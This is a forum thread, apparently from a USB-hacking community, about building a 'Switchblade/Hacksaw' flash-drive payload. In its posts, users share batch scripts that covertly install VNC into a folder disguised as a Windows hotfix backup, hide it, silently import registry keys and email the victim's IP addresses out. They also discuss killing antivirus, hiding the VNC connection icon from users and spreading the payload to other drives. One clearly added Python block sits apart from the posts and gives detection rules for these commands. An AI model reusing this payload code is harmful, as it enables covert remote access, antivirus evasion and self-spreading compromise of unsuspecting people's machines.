Switchblade + Hacksaw + VNC + nmap = spektormax's payload


spektormax
I just redownloaded it from the site and it looks like I have the right version. I was trying to add the auto ipsender now and it looks like it works... I add an ipconfig to get the local IP of the machine along with the whatismyip.com to get the IP for one in my house that I am testing with...

In my email I am only getting the first whatismyip.com file. I added mine to the email and it works if I run it manually. How can I change it to send the IP daily, not every 30 minutes?

Sample:

for %%i in (ip.txt,c:iplocal.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup

Link to comment

OK, so I am trying to debug this VNC installer, and after the files are copied I get this:

18 file(s) copied.

System error 3 has occurred.

The system cannot find the path specified.

Press any key to continue . . .

____

I'm not sure if it cannot find the

net start winvnc or the nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

Link to comment

Still working on the VNC issue. I am using this. It is not starting the service; I get a message that says it cannot find it. It does not appear to be a valid service. However, I can start it manually. Also, if I just put winvnc in the install file instead of net start vnc, it starts but just hangs there.

mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn" 

cd ../VNCInstallFiles 

copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn" 

attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h 

regedit /s ../CMD/vncdmp.reg 

regedit /s ../CMD/vncdmp1.reg 

regedit /s ../CMD/vncdmp2.reg 

ping -n 1 localhost > nul 

net start WinVNC 

nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

Link to comment
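For defenders, the command sequence in the install script above is a usable detection signature. The following added example (not part of any post in this thread) matches those command-line traits in process-creation records and alerts when several occur on one host within a short window. The rule names, record fields, host names and thresholds are hypothetical, and the sample records are constructed.

```python
import re
from collections import defaultdict

# Command-line traits of the install script quoted in this thread.
RULES = [
    # Assumption: a genuine XP hotfix backup folder is "KB" plus 6-7 digits;
    # any other $NtUninstallKB...$ name is treated as a lookalike.
    ("kb_lookalike_dir", re.compile(r"\$NtUninstallKB(?!\d{6,7}\$)[0-9a-z_-]+\$", re.I)),
    ("hide_dir_attrib", re.compile(r"\battrib\b.*(\+s\s+\+h|\+h\s+\+s)", re.I)),
    ("silent_reg_import", re.compile(r"\bregedit(\.exe)?\s+/s\b", re.I)),
    ("winvnc_service_start", re.compile(r"\bnet1?(\.exe)?\s+start\s+winvnc\b", re.I)),
    ("nircmd_execmd", re.compile(r"\bnircmd(\.exe)?\s+execmd\b", re.I)),
    ("blat_local_relay", re.compile(r"\bblat(\.exe)?\s.*-server\s+127\.0\.0\.1:\d+", re.I)),
]

def match_rules(cmdline):
    """Names of every rule whose pattern appears in one command line."""
    return {name for name, rx in RULES if rx.search(cmdline)}

def triage(events, min_rules=3, window_s=600):
    """Return {host: sorted rule names} for hosts where at least min_rules
    distinct rules fire within window_s seconds of an initial hit."""
    hits = defaultdict(list)  # host -> [(seconds, rule), ...]
    for ev in events:
        for rule in match_rules(ev["cmd"]):
            hits[ev["host"]].append((ev["ts"], rule))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            rules = {r for t, r in seen[i:] if t - start <= window_s}
            if len(rules) >= min_rules:
                alerts[host] = sorted(rules)
                break
    return alerts

# Constructed process-creation records: host, seconds, command line.
SAMPLE_EVENTS = [
    {"host": "WS-07", "ts": 0, "cmd": r"attrib C:\WINDOWS\$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h"},
    {"host": "WS-07", "ts": 3, "cmd": "regedit /s ../CMD/vncdmp.reg"},
    {"host": "WS-07", "ts": 5, "cmd": "net start WinVNC"},
    {"host": "WS-07", "ts": 6, "cmd": "nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd"},
    {"host": "WS-07", "ts": 40, "cmd": "blat.exe ip.txt -base64 -server 127.0.0.1:1099"},
    {"host": "WS-12", "ts": 9, "cmd": r"regedit /s C:\deploy\proxy.reg"},
    {"host": "WS-12", "ts": 11, "cmd": r"cmd /c dir C:\WINDOWS\$NtUninstallKB893756$"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

A single silent registry import, as on the second constructed host, stays below the default threshold; only the combination raises an alert.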

I have updated the antidote to also uninstall VNC (it didn't do so before).

It now also properly uninstalls folding@Home vs being finished after restart. I have looked over the VNC thing, but have only dirty answers (I don't like using software that will show up on a virus scanner, as I unfortunately did with Folding (but avkill fixes that)). With a little tool, I can install the service; however, the little No-Icon hack isn't working for some reason.

Link to comment

After like 3 hours of work I found the issue: the registry ORLWInVNC3 had to be WInVNc3. I took advantage of the fact that I was fixing stuff to update avkill to the 1.2BETA version. I also redid the antidote just a tad so it cleans up a few more things. Warning, there are now 2 files that will trip a virus scanner. They are the file used to start folding silently and the file used to install VNC as a service. Both are solved using avkill. If you don't use the avkill, disable VNC and Folding or you might get virus scanners that pop up and yell at you. Also, in order for folding to work, it installs the avkill as a service. It is very crucial that this works (it won't show up in services.msc but it will show up in the runs in the registry). (Yes, I know I could have used this on VNC, but first of all I'm not sure if it would work right and I don't have a year to do it and check, and second, since avkill is already there, why not use it.)

Link to comment

Well, unfortunately the only way I found to install VNC as a service was a program I found on the net. The problem is that virus scanners trip. So you have to run avkill to stop them and then use it. You have to use it to remove it as well, so the antidote avkills, then it uninstalls, and then it shuts down avkill. The Folding@home hack installs folding at home and folds for the U3_zomvies team.

Link to comment

Does the antidote work for VNC? I can't get it to uninstall. It looks like it does not actually take away the VNC icon in the toolbar, but it keeps the status looking the same so the user does not know that you are connected...

Can you tell me what all the VNC hack does? I want to change the password but it will not let me now. I will redownload and try the antidote again.

Link to comment

First of all, VNC has been VASTLY redone in the last 2 weeks (so has the new antidote; the old one didn't uninstall VNC). The antidote removes everything, deletes the directories, deletes the registries, uninstalls the service, and cleans up all traces. The latest antidote removes VNC completely; for anyone else that has a problem, make sure you download the latest version. Next time I release parts (if I do) I'll put a post. Also, if you guys want something in the payload that isn't, let me know and I'll make it (assuming I can and have the time to).

Link to comment

@ spektormax

I would like to know how you would go about modifying the hacksaw part of the code to where, when any future flash drives are plugged in, it copies the hacksaw payload to them, as well as doing its current job. It was mentioned that this would be possible in the last episode, but I've yet to see it mentioned here.

It seems simple to do, but... if done wouldn't that drive need to be flashed also? That's where I think it could get complex.

Link to comment

@ spektormax

Gotcha, makes more sense also. I totally spaced the hacksaw on a non-U3. After as interesting and useful as your payload already is, I'm shocked you haven't already added that... I got it, you're not thinkin it in your head, you're comin back with something even more lethal and interesting ;)

Link to comment

Well, 2 things that are an issue. 1 is that I can't get the drive letter of the flash drive. Most likely I will just grab the drive letter when the drive is inserted and store it. And 2, I don't want skiddies using it to install their little bots (you know what I mean).

Link to comment

Does anyone know how to get the drive letter of a freshly inserted drive (I don't have the MSVB 6.0 compiler), or perhaps just in the sbs.exe add a strcpy, and copy the info in the dummy to the end of "send.bat" and shell execute that? That would be enough for me to get it to work.

edit: I figured out how to do it, production of ICBM has begun

Link to comment